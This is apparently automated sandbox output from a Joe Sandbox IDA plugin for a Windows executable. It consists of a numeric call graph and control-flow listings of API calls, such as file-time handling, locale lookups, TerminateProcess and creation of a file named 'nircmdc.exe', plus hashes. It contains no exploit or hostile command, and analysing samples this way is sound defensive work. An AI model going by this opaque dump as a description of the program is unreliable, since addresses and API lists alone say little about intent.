16761 404713 16751->16761 16755 404987 16752->16755 16753 4051c2 16754 41908b 2 API calls 16754->16761 16757 406ae0 30 API calls 16755->16757 16756 41b5e5 6 API calls 16756->16761 16758 4049d2 16757->16758 16759 4068d0 6 API calls 16758->16759 16758->16761 16763 4049e5 16759->16763 16760 412920 26 API calls 16760->16761 16761->16753 16761->16754 16761->16756 16761->16760 16762 4068d0 6 API calls 16761->16762 16762->16761 16763->16761 16767 40b740 16763->16767 16765 404a60 16766 412920 26 API calls 16765->16766 16766->16761 16768 4068d0 6 API calls 16767->16768 16769 40b74f 16768->16769 16769->16765 15836 40a91f 15839 4066f0 15836->15839 15838 40a929 15845 41b7db 15839->15845 15841 406752 15841->15838 15842 406700 15842->15841 15843 412920 26 API calls 15842->15843 15844 406735 15843->15844 15844->15838 15846 41b7f2 32 API calls 15845->15846 15847 41b7ee 15846->15847 15847->15842 15698 406c28 15699 406c46 15698->15699 15700 406c2f 15698->15700 15701 415612 6 API calls 15700->15701 15701->15699 14961 412bc1 14962 412bda 14961->14962 14970 412bf5 14961->14970 14963 412be7 14962->14963 14968 412c0b 14962->14968 14962->14970 14963->14970 14980 412dc7 14963->14980 14964 412d1f 14966 412ee2 19 API calls 14964->14966 14964->14970 14965 412d30 14990 412f9b 14965->14990 14966->14970 14968->14964 14968->14965 14978 412c3d 14968->14978 14971 412d8f 14971->14964 14973 412d96 14971->14973 14972 412d40 14972->14970 14972->14971 14975 412dc7 44 API calls 14972->14975 14994 412ee2 14973->14994 14975->14972 14976 412d9b 14977 413326 ___free_lc_time 7 API calls 14976->14977 14977->14970 14978->14964 14978->14970 14979 412dc7 44 API calls 14978->14979 14979->14978 14981 412f9b 25 API calls 14980->14981 14982 412dee 14981->14982 14983 413274 12 API calls 14982->14983 14989 412eb3 14982->14989 14984 412e0c 14983->14984 14985 412ea2 14984->14985 14986 412ec5 14984->14986 14984->14989 14987 413326 ___free_lc_time 7 API calls 14985->14987 14988 413326 ___free_lc_time 7 API calls 14986->14988 14986->14989 14987->14989 14988->14989 14989->14970 14991 412fb4 14990->14991 14993 412fbe 14990->14993 14991->14993 15001 416af5 14991->15001 14993->14972 14995 412ef2 14994->14995 14997 412efc 14994->14997 14996 413274 12 API calls 14995->14996 14996->14997 14998 412f7c 14997->14998 14999 413326 ___free_lc_time 7 API calls 14997->14999 14998->14976 15000 412f8d 14999->15000 15000->14976 15002 416b21 15001->15002 15003 416b02 15001->15003 15004 416bad 15002->15004 15006 416b48 15002->15006 15037 416c72 15002->15037 15035 417226 GetVersionExA 15003->15035 15053 417125 GetUserDefaultLCID 15004->15053 15010 416b6c 15006->15010 15013 416c72 15 API calls 15006->15013 15012 416b9e 15010->15012 15014 416b88 15010->15014 15011 416b95 15028 416c55 15011->15028 15029 41713f 15011->15029 15012->15004 15016 416ba6 15012->15016 15013->15010 15017 416b97 15014->15017 15021 416b90 15014->15021 15049 417068 15016->15049 15045 416f55 15017->15045 15041 416cca 15021->15041 15022 416bd5 IsValidCodePage 15023 416be7 IsValidLocale 15022->15023 15022->15028 15025 416bf9 15023->15025 15023->15028 15026 416c22 GetLocaleInfoA 15025->15026 15025->15028 15027 416c3a GetLocaleInfoA 15026->15027 15026->15028 15027->15028 15028->14993 15034 41714c 15029->15034 15030 417188 GetLocaleInfoA 15031 416bca 15030->15031 15032 417198 15030->15032 15031->15022 15031->15028 15033 41aa8d 6 API calls 15032->15033 15033->15031 15034->15030 15034->15032 15036 416b07 15035->15036 15036->15002 15038 416c82 15037->15038 15039 416cc5 15037->15039 15038->15039 15040 41a950 15 API calls 15038->15040 15039->15006 15040->15038 15042 416cd5 15041->15042 15043 416d29 EnumSystemLocalesA 15042->15043 15044 416d40 15043->15044 15044->15011 15047 416f60 15045->15047 15046 416f8d EnumSystemLocalesA 15048 416fa3 15046->15048 15047->15046 15048->15011 15054 4157c0 15049->15054 15052 417097 15052->15011 15053->15011 15055 4157cc EnumSystemLocalesA 15054->15055 15055->15052 15056 4069c0 15057 4069d3 15056->15057 15058 4069cd 15056->15058 15059 41b5e5 6 API calls 15057->15059 15060 4069dc 15057->15060 15061 406a11 15059->15061 15061->15060 15063 413825 15061->15063 15066 413847 15063->15066 15067 413853 GetCurrentProcess TerminateProcess 15066->15067 15070 413864 15066->15070 15067->15070 15068 413832 15068->15060 15069 4138ce ExitProcess 15070->15068 15070->15069 15071 4039f0 15072 413274 12 API calls 15071->15072 15073 4039f9 15072->15073 15074 413274 12 API calls 15073->15074 15086 403a36 15073->15086 15074->15086 15077 407860 51 API calls 15077->15086 15078 406640 CharToOemA MultiByteToWideChar MultiByteToWideChar 15078->15086 15079 41908b 2 API calls 15079->15086 15080 403e37 15082 403ebd 15080->15082 15083 413274 12 API calls 15080->15083 15081 41b5e5 6 API calls 15081->15086 15084 40404f 15082->15084 15106 403ff5 15082->15106 15110 40404a 15082->15110 15085 403e62 15083->15085 15089 413326 ___free_lc_time 7 API calls 15084->15089 15091 403e6f 15085->15091 15097 403ec2 15085->15097 15086->15077 15086->15078 15086->15079 15086->15080 15086->15081 15087 404340 29 API calls 15086->15087 15088 412920 26 API calls 15086->15088 15092 409fb0 17 API calls 15086->15092 15135 4068d0 15086->15135 15139 40b510 15086->15139 15087->15086 15088->15086 15089->15110 15090 4040c8 15096 412920 26 API calls 15090->15096 15101 40411c 15090->15101 15121 40428d 15090->15121 15094 412920 26 API calls 15091->15094 15092->15086 15093 4040c2 15095 413326 ___free_lc_time 7 API calls 15093->15095 15120 403e83 15094->15120 15095->15090 15105 4040f1 15096->15105 15097->15097 15099 403f88 15097->15099 15115 403f1a 15097->15115 15098 412920 26 API calls 15098->15106 15103 413326 ___free_lc_time 7 API calls 15099->15103 15100 404044 15107 413326 ___free_lc_time 7 API calls 15100->15107 15102 404162 15101->15102 15117 404292 15101->15117 15101->15121 15108 404193 15102->15108 15109 404166 15102->15109 15127 403f92 15103->15127 15104 412920 26 API calls 15104->15110 15122 412920 26 API calls 15105->15122 15106->15098 15106->15100 15107->15110 15112 4041b3 15108->15112 15113 404197 15108->15113 15116 412920 26 API calls 15109->15116 15110->15090 15110->15093 15110->15104 15119 4041e2 15112->15119 15126 4041c7 15112->15126 15118 412920 26 API calls 15113->15118 15114 413326 ___free_lc_time 7 API calls 15114->15120 15115->15099 15123 412920 26 API calls 15115->15123 15124 413326 ___free_lc_time 7 API calls 15115->15124 15142 40ff00 15115->15142 15132 40418e 15116->15132 15117->15121 15125 412920 26 API calls 15117->15125 15118->15132 15130 412920 26 API calls 15119->15130 15120->15082 15120->15114 15122->15101 15123->15115 15124->15115 15125->15121 15128 412920 26 API calls 15126->15128 15127->15082 15129 412920 26 API calls 15127->15129 15128->15132 15129->15082 15130->15132 15131 40424c 15131->15121 15134 412920 26 API calls 15131->15134 15132->15131 15133 412920 26 API calls 15132->15133 15133->15131 15134->15121 15137 4068e4 15135->15137 15138 406978 15135->15138 15136 41b5e5 6 API calls 15136->15137 15137->15136 15137->15138 15138->15086 15176 40b620 15139->15176 15141 40b515 15141->15086 15143 40f6b0 GetVersion 15142->15143 15144 40ff05 15143->15144 15145 40ff09 15144->15145 15146 40ff0a CreateFileA 15144->15146 15145->15115 15147 40ff3b 15146->15147 15167 40fffa 15146->15167 15150 406640 3 API calls 15147->15150 15161 40ff64 15147->15161 15148 41004a 15149 406640 3 API calls 15148->15149 15153 41005a GetLastError 15149->15153 15154 40ff54 15150->15154 15151 40f980 70 API calls 15155 40ff93 15151->15155 15152 41011e CloseHandle 15156 410074 15152->15156 15157 412920 26 API calls 15153->15157 15158 412920 26 API calls 15154->15158 15159 410013 15155->15159 15160 40ffa2 15155->15160 15156->15115 15157->15156 15158->15161 15165 412920 26 API calls 15159->15165 15159->15167 15162 40ffc6 15160->15162 15166 406640 3 API calls 15160->15166 15161->15151 15164 412920 26 API calls 15162->15164 15163 41009f 15163->15152 15169 4100c7 SetFileTime 15163->15169 15164->15167 15165->15167 15168 40ffb6 15166->15168 15167->15148 15167->15163 15170 412920 26 API calls 15168->15170 15169->15152 15171 4100d5 GetLastError 15169->15171 15170->15162 15172 406640 3 API calls 15171->15172 15173 4100eb 15172->15173 15174 412920 26 API calls 15173->15174 15175 4100fe 15174->15175 15175->15152 15177 4068d0 6 API calls 15176->15177 15178 40b62f 15177->15178 15178->15141 15509 404ab2 15510 404ab6 15509->15510 15511 404abd 15510->15511 15522 404ae4 15510->15522 15512 406640 3 API calls 15511->15512 15514 404ad6 15512->15514 15513 404c22 15515 404c58 15513->15515 15517 413326 ___free_lc_time 7 API calls 15513->15517 15516 412920 26 API calls 15514->15516 15518 407860 51 API calls 15515->15518 15556 404713 15516->15556 15517->15515 15520 404c79 15518->15520 15519 404bc2 15519->15513 15523 406640 3 API calls 15519->15523 15525 404cb2 15520->15525 15531 404c8b 15520->15531 15521 404b69 15524 413326 ___free_lc_time 7 API calls 15521->15524 15522->15519 15522->15521 15526 406640 3 API calls 15522->15526 15527 404c0f 15523->15527 15524->15519 15563 404d81 15525->15563 15631 402450 15525->15631 15528 404b3f 15526->15528 15529 412920 26 API calls 15527->15529 15532 406640 3 API calls 15528->15532 15529->15513 15534 406640 3 API calls 15531->15534 15535 404b56 15532->15535 15533 404ccd 15536 404cd8 15533->15536 15533->15563 15534->15514 15537 412920 26 API calls 15535->15537 15538 404d3b 15536->15538 15539 404cdd 15536->15539 15537->15521 15541 406640 3 API calls 15538->15541 15545 406640 3 API calls 15539->15545 15539->15556 15540 4051c2 15544 404d55 15541->15544 15542 41908b 2 API calls 15542->15556 15546 412920 26 API calls 15544->15546 15548 404d09 15545->15548 15546->15556 15547 41b5e5 6 API calls 15547->15556 15551 412920 26 API calls 15548->15551 15549 405099 15553 4050a0 15549->15553 15554 405113 15549->15554 15550 412920 26 API calls 15550->15563 15551->15556 15661 40fde0 15553->15661 15554->15556 15560 406640 3 API calls 15554->15560 15556->15540 15556->15542 15556->15547 15558 412920 26 API calls 15556->15558 15559 4068d0 6 API calls 15556->15559 15557 4050aa 15557->15556 15561 412920 26 API calls 15557->15561 15558->15556 15559->15556 15560->15514 15561->15556 15562 406640 CharToOemA MultiByteToWideChar MultiByteToWideChar 15562->15563 15563->15549 15563->15550 15563->15556 15563->15562 15565 405063 OemToCharA 15563->15565 15566 4109d0 15563->15566 15651 4077c0 15563->15651 15657 407d60 15563->15657 15565->15563 15569 4109f6 15566->15569 15567 410a69 15568 411170 103 API calls 15567->15568 15619 410b0a 15568->15619 15569->15567 15571 41338f 6 API calls 15569->15571 15570 411073 15570->15563 15571->15567 15572 410d48 15573 407d60 2 API calls 15572->15573 15574 410d81 15573->15574 15576 410d8f 15574->15576 15600 410ede 15574->15600 15575 41338f 6 API calls 15575->15619 15579 411170 103 API calls 15576->15579 15578 411100 36 API calls 15578->15619 15583 410d9b 15579->15583 15580 410f26 15582 411120 78 API calls 15580->15582 15581 413755 2 API calls 15581->15619 15584 410f38 15582->15584 15586 410e61 15583->15586 15587 410dab 15583->15587 15589 410f43 15584->15589 15590 410f8e 15584->15590 15585 410d17 15585->15572 15603 406640 3 API calls 15585->15603 15588 410ecb 15586->15588 15597 410e76 SetFileAttributesA 15586->15597 15591 410dd5 15587->15591 15592 406640 3 API calls 15587->15592 15588->15563 15596 406640 3 API calls 15589->15596 15598 411170 103 API calls 15590->15598 15594 410df9 SetFileAttributesA 15591->15594 15595 410e4e 15591->15595 15599 410dc5 15592->15599 15593 41338f 6 API calls 15593->15600 15594->15595 15601 410e0c 15594->15601 15595->15563 15602 410f54 15596->15602 15597->15588 15604 410e89 15597->15604 15605 410f9a 15598->15605 15606 412920 26 API calls 15599->15606 15600->15580 15600->15593 15607 406640 3 API calls 15601->15607 15608 412920 26 API calls 15602->15608 15609 410d38 15603->15609 15610 406640 3 API calls 15604->15610 15611 411170 103 API calls 15605->15611 15606->15591 15612 410e1d GetLastError 15607->15612 15613 410f64 15608->15613 15614 412920 26 API calls 15609->15614 15616 410e9a GetLastError 15610->15616 15617 410fa6 15611->15617 15618 412920 26 API calls 15612->15618 15613->15563 15614->15572 15615 411170 103 API calls 15615->15619 15620 412920 26 API calls 15616->15620 15617->15570 15623 411020 SetVolumeLabelA 15617->15623 15624 406640 3 API calls 15617->15624 15621 410e37 15618->15621 15619->15570 15619->15572 15619->15575 15619->15578 15619->15581 15619->15585 15619->15615 15672 411120 15619->15672 15622 410eb4 15620->15622 15621->15595 15622->15588 15623->15588 15625 411038 15623->15625 15627 410ff4 15624->15627 15626 412920 26 API calls 15625->15626 15628 411049 15626->15628 15629 412920 26 API calls 15627->15629 15628->15563 15630 411009 15629->15630 15630->15623 15632 40246a 15631->15632 15635 4024ad 15632->15635 15675 4069c0 15632->15675 15634 4024f5 15636 402563 15634->15636 15637 40253e 15634->15637 15646 402504 15634->15646 15635->15634 15638 4024e0 15635->15638 15639 402559 15635->15639 15641 413274 12 API calls 15636->15641 15682 402660 15637->15682 15638->15637 15644 413274 12 API calls 15638->15644 15639->15636 15642 413326 ___free_lc_time 7 API calls 15639->15642 15643 402548 15641->15643 15642->15636 15645 40254f 15643->15645 15647 402634 15643->15647 15650 402660 21 API calls 15643->15650 15644->15634 15645->15533 15646->15533 15648 413326 ___free_lc_time 7 API calls 15647->15648 15649 40263f 15648->15649 15649->15533 15650->15643 15652 411df0 89 API calls 15651->15652 15653 4077d2 15652->15653 15654 4077d9 15653->15654 15655 407730 55 API calls 15653->15655 15654->15563 15656 40784a 15655->15656 15656->15563 15658 407d90 15657->15658 15659 407d6e 15657->15659 15658->15563 15659->15658 15660 413755 2 API calls 15659->15660 15660->15659 15662 40f6b0 GetVersion 15661->15662 15663 40fdea 15662->15663 15664 40fdee 15663->15664 15665 40fe26 15663->15665 15666 40fac0 GetVersion 15663->15666 15664->15557 15667 413274 12 API calls 15665->15667 15666->15665 15668 40fe59 15667->15668 15669 40fe68 15668->15669 15670 40fb60 71 API calls 15668->15670 15669->15557 15671 40fee2 15670->15671 15671->15557 15673 41c29c 78 API calls 15672->15673 15674 411130 15673->15674 15674->15619 15674->15674 15676 4069d3 15675->15676 15677 4069cd 15675->15677 15678 41b5e5 6 API calls 15676->15678 15679 4069dc 15676->15679 15677->15632 15680 406a11 15678->15680 15679->15632 15680->15679 15681 413825 3 API calls 15680->15681 15681->15679 15683 402673 15682->15683 15684 4026df 15683->15684 15685 413274 12 API calls 15683->15685 15684->15643 15686 402691 15685->15686 15687 4026a1 CharToOemA 15686->15687 15688 40269a 15686->15688 15689 4026b6 15687->15689 15688->15643 15690 4026d4 15689->15690 15691 4026bf OemToCharA 15689->15691 15692 413326 ___free_lc_time 7 API calls 15690->15692 15691->15690 15692->15684

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 296 41c29c-41c2ba call 41cb10 299 41c2bc-41c2c2 296->299 300 41c2cf-41c2df 296->300 301 41c2f3 call 41ca52 299->301 302 41c2c4-41c2c8 299->302 303 41c54a-41c54e 300->303 307 41c2f8-41c311 FindFirstFileA 301->307 305 41c2e4-41c2f1 call 41ca95 302->305 306 41c2ca-41c2cd 302->306 305->307 306->300 306->305 309 41c317-41c326 call 41cb10 307->309 310 41c3be-41c3d1 FileTimeToLocalFileTime 307->310 318 41c3ac-41c3b9 309->318 319 41c32c-41c345 call 41c9af 309->319 313 41c532-41c542 GetLastError call 419c07 FindClose 310->313 314 41c3d7-41c3e7 FileTimeToSystemTime 310->314 322 41c548 313->322 314->313 316 41c3ed-41c420 call 419a07 314->316 326 41c422-41c428 316->326 327 41c42a-41c43d FileTimeToLocalFileTime 316->327 318->322 319->318 328 41c347-41c351 call 4157c0 319->328 322->303 326->327 329 41c480-41c489 326->329 327->313 330 41c443-41c453 FileTimeToSystemTime 327->330 341 41c353-41c35c call 41c54f 328->341 342 41c35e-41c368 GetDriveTypeA 328->342 333 41c498-41c4ab FileTimeToLocalFileTime 329->333 334 41c48b-41c491 329->334 330->313 332 41c459-41c47d call 419a07 330->332 332->329 333->313 336 41c4b1-41c4c1 FileTimeToSystemTime 333->336 334->333 335 41c493-41c496 334->335 339 41c4ea-41c4f0 FindClose 335->339 336->313 340 41c4c3-41c4e7 call 419a07 336->340 345 41c4f6-41c530 call 41c1e4 339->345 340->339 341->318 341->342 342->318 347 41c36a-41c3a7 call 419a07 342->347 345->303 347->345
                                        APIs
                                        • FindFirstFileA.KERNELBASE(00000000,?,?,?,00000001), ref: 0041C303
                                        • GetDriveTypeA.KERNEL32(00000000), ref: 0041C35F
                                        • FileTimeToLocalFileTime.KERNEL32(?,00000000), ref: 0041C3C9
                                        • FileTimeToSystemTime.KERNEL32(00000000,?), ref: 0041C3DF
                                        • FileTimeToLocalFileTime.KERNEL32(?,00000000), ref: 0041C435
                                        • FileTimeToSystemTime.KERNEL32(00000000,?), ref: 0041C44B
                                        • FileTimeToLocalFileTime.KERNEL32(?,00000000), ref: 0041C4A3
                                        • FileTimeToSystemTime.KERNEL32(00000000,?), ref: 0041C4B9
                                        • FindClose.KERNELBASE(?), ref: 0041C4F0
                                        • GetLastError.KERNEL32 ref: 0041C532
                                        • FindClose.KERNEL32(?), ref: 0041C542
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: Time$File$FindLocalSystem$Close$DriveErrorFirstLastType
                                        • String ID: ./\
                                        • API String ID: 816071114-3176372042
                                        • Opcode ID: de69cfd65508da5e28b4097bf2a6a8e8f7020ae88d7c1538e3f84fae5ecebbca
                                        • Instruction ID: a4bf26b3288f0746aeaefe6eee33eeb9c95b8158a33583b504b7627764fa2a0b
                                        • Opcode Fuzzy Hash: de69cfd65508da5e28b4097bf2a6a8e8f7020ae88d7c1538e3f84fae5ecebbca
                                        • Instruction Fuzzy Hash: 3A815D72940229AACB20DFA5DC85AEFB7FCBF08341F00446BF555E2141E73C9A84CB69

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 452 416af5-416b00 453 416b21-416b27 452->453 454 416b02-416b09 call 417226 452->454 455 416bad call 417125 453->455 456 416b2d-416b35 453->456 466 416b17 454->466 467 416b0b-416b15 454->467 465 416bb2-416bb8 455->465 458 416b37-416b48 call 416c72 456->458 459 416b4b-416b55 456->459 458->459 463 416b74-416b82 459->463 464 416b57-416b59 459->464 470 416b84-416b86 463->470 471 416b9e-416ba0 463->471 464->463 469 416b5b-416b71 call 416c72 464->469 472 416c6c 465->472 473 416bbe-416bc5 call 41713f 465->473 466->453 467->453 469->463 470->471 477 416b88-416b8a 470->477 471->455 474 416ba2-416ba4 471->474 476 416c6e-416c71 472->476 483 416bca-416bcf 473->483 474->455 479 416ba6-416bab call 417068 474->479 481 416b97-416b9c call 416f55 477->481 482 416b8c-416b8e 477->482 479->465 481->465 482->481 486 416b90-416b95 call 416cca 482->486 483->472 487 416bd5-416be1 IsValidCodePage 483->487 486->465 487->472 488 416be7-416bf7 IsValidLocale 487->488 488->472 493 416bf9-416bff 488->493 494 416c01-416c16 493->494 495 416c1a-416c20 493->495 494->495 496 416c22-416c38 GetLocaleInfoA 495->496 497 416c67-416c6a 495->497 496->472 498 416c3a-416c53 GetLocaleInfoA 496->498 497->476 498->472 499 416c55-416c64 call 41a8c2 498->499 499->497
                                        APIs
                                        • IsValidCodePage.KERNEL32(00000000,004259A8,?,00425924,0041303A,?,00428D8C,?,?,?,00000000), ref: 00416BD9
                                        • IsValidLocale.KERNEL32(00000001,?,00000000), ref: 00416BEF
                                        • GetLocaleInfoA.KERNEL32(00001001,?,00000040,?,00000000), ref: 00416C30
                                        • GetLocaleInfoA.KERNEL32(00001002,?,00000040,?,00000000), ref: 00416C4B
                                          • Part of subcall function 00417226: GetVersionExA.KERNEL32(?), ref: 00417240
                                          • Part of subcall function 00417068: EnumSystemLocalesA.KERNEL32(0041709F,00000001,004259A8,?,00425924,0041303A,?,00428D8C,?,?,?,00000000), ref: 00417088
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: Locale$InfoValid$CodeEnumLocalesPageSystemVersion
                                        • String ID: l-B$|1B
                                        • API String ID: 4087412349-1682926205
                                        • Opcode ID: 14451e5f9ff0b11f7926cd449961003fc9334d28c4f7d9c07cbd2b1cfb64d6f8
                                        • Instruction ID: 77c45fc4a99a2d4965105fa733fd9383233311c3507932e8642f778f9422cabb
                                        • Opcode Fuzzy Hash: 14451e5f9ff0b11f7926cd449961003fc9334d28c4f7d9c07cbd2b1cfb64d6f8
                                        • Instruction Fuzzy Hash: C131F6717052609BD7309F61AC81AAB3AA5EB00704F5B403FE540D7391EABEE8C9C75D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 502 4194bd-4194ea call 4131f7 505 4194f0-4194fd GetTimeZoneInformation 502->505 506 4195e6-4195e9 502->506 507 419503-419526 505->507 508 419715-41971a 505->508 506->508 509 4195ef-4195f6 506->509 512 419534-41953b 507->512 513 419528-41952f 507->513 510 419609-41962b call 413326 call 4157c0 call 413274 509->510 511 4195f8-419603 call 4165c0 509->511 510->508 533 419631-419658 call 4166d0 call 4140c0 510->533 511->508 511->510 516 419558-41955e 512->516 517 41953d-419544 512->517 513->512 521 419564-41958e WideCharToMultiByte 516->521 517->516 520 419546-419556 517->520 520->521 523 4195a1-4195a6 521->523 524 419590-419594 521->524 527 4195a9-4195c8 WideCharToMultiByte 523->527 524->523 526 419596-41959f 524->526 526->527 529 41970d-419712 527->529 530 4195ce-4195d2 527->530 529->508 530->529 532 4195d8-4195e1 530->532 532->508 538 41965a-41965d 533->538 539 41965e-41966f call 41aa8d 533->539 538->539 542 419675-419679 539->542 543 419683-419684 542->543 544 41967b-41967d 542->544 543->542 545 419686-419689 544->545 546 41967f-419681 544->546 547 4196d9-4196db 545->547 548 41968b-41969e call 41aa8d 545->548 546->543 546->545 549 4196e5-4196ef 547->549 550 4196dd-4196df 547->550 555 4196a4-4196a8 548->555 549->529 552 4196f1-41970b call 4140c0 549->552 550->549 552->508 557 4196b1-4196b4 555->557 558 4196aa-4196ac 555->558 557->547 560 4196b6-4196c6 call 41aa8d 557->560 558->557 559 4196ae-4196af 558->559 559->555 563 4196cc-4196d0 560->563 563->547 564 4196d2-4196d4 563->564 564->547 565 4196d6-4196d7 564->565 565->563
                                        APIs
                                        • GetTimeZoneInformation.KERNELBASE(00428F08,00000000,00000000,00000001,00000000,?,0040A354,?,00000000,?,?,?,?,0040144E), ref: 004194F5
                                        • WideCharToMultiByte.KERNEL32(00000220,Eastern Standard Time,00000000,0000003F,00000000,?,?,0040A354,?,00000000,?,?,?,?,0040144E), ref: 0041958A
                                        • WideCharToMultiByte.KERNEL32(00000220,Eastern Summer Time,00000000,0000003F,00000000,?,?,0040A354,?,00000000,?,?,?,?,0040144E), ref: 004195C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$InformationTimeZone
                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                        • API String ID: 1904278450-239921721
                                        • Opcode ID: c9d78c50aff07665b13410a1bc301889d252633011d0570864fa1448f4cdbf1b
                                        • Instruction ID: d190c84c4cc0c26642eb153707845cbe8beff245003c06114f550f7d716fb191
                                        • Opcode Fuzzy Hash: c9d78c50aff07665b13410a1bc301889d252633011d0570864fa1448f4cdbf1b
                                        • Instruction Fuzzy Hash: 5561C1B1707250AFD7318F15AC61BAA7B9ABB45344F95003FE085872A5DF788CC2C66E
                                        APIs
                                        • GetLocaleInfoA.KERNELBASE(00001004,?,00000008,?,?,?,?,00416BCA,?,004259A8,?,00425924,0041303A,?,00428D8C,?), ref: 0041718E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: ACP$OCP
                                        • API String ID: 2299586839-711371036
                                        • Opcode ID: 4709dea30003b597f3d8250bd796ea7638c71e64de1883d2224e33a91a822167
                                        • Instruction ID: 903deaa607cf639364b7cc7254e85297317a472b98b4467e3dd4c96a9452e7fa
                                        • Opcode Fuzzy Hash: 4709dea30003b597f3d8250bd796ea7638c71e64de1883d2224e33a91a822167
                                        • Instruction Fuzzy Hash: 1CF0FC3264962439FB215751AC02FEB376C9F01751F50001FF940E52C1EB9C9BC5C29D
                                        APIs
                                        • GetLocalTime.KERNEL32(00407739), ref: 00413FAB
                                        • GetSystemTime.KERNEL32(?), ref: 00413FB5
                                        • GetTimeZoneInformation.KERNELBASE(?), ref: 0041400A
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: Time$InformationLocalSystemZone
                                        • String ID:
                                        • API String ID: 2475273158-0
                                        • Opcode ID: dca7f0237e856ea5404fbb126ca6f1160033c27d591cee985ea1f73d045f6dfd
                                        • Instruction ID: 63eaa413687e3a0af9faf97127154bf37a26255f9c7758cb6ae69d944a5b3749
                                        • Opcode Fuzzy Hash: dca7f0237e856ea5404fbb126ca6f1160033c27d591cee985ea1f73d045f6dfd
                                        • Instruction Fuzzy Hash: 46218E39901015E9CB21AB9AD804AFF7BB9BB4C754F800416FA10E7294E7BD8DC6C76C

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 253 40f740-40f75b call 4144da 256 40f761-40f7aa call 40fb60 CreateFileA 253->256 257 40f974-40f97a 253->257 260 40f7ea-40f7f1 256->260 261 40f7ac-40f7bd SetFileAttributesA 256->261 263 40f7f7-40f819 call 40fac0 260->263 264 40f8ce-40f8d1 260->264 261->260 262 40f7bf-40f7e7 GetLastError call 412920 261->262 262->260 263->264 276 40f81f-40f843 call 40f980 263->276 267 40f8d3-40f904 GetLastError call 412920 264->267 268 40f905-40f907 264->268 269 40f909-40f941 SetFileTime 268->269 270 40f96d-40f96e CloseHandle 268->270 269->270 275 40f943-40f96a GetLastError call 412920 269->275 270->257 275->270 276->264 283 40f849-40f850 276->283 284 40f852-40f896 call 406640 call 412920 283->284 285 40f898 283->285 284->285 288 40f89d-40f8cb call 412920 284->288 285->288 288->264
                                        APIs
                                        • CreateFileA.KERNELBASE(nircmdc.exe,40000000,00000002,00000000,00000003,00000080,00000000), ref: 0040F791
                                        • SetFileAttributesA.KERNEL32(nircmdc.exe,00000020), ref: 0040F7B5
                                        • GetLastError.KERNEL32(00000001), ref: 0040F7C1
                                        • GetLastError.KERNEL32(00000001), ref: 0040F8D5
                                        • SetFileTime.KERNELBASE(00000000,00000000,00000000,00000000), ref: 0040F939
                                        • GetLastError.KERNEL32(00000000), ref: 0040F944
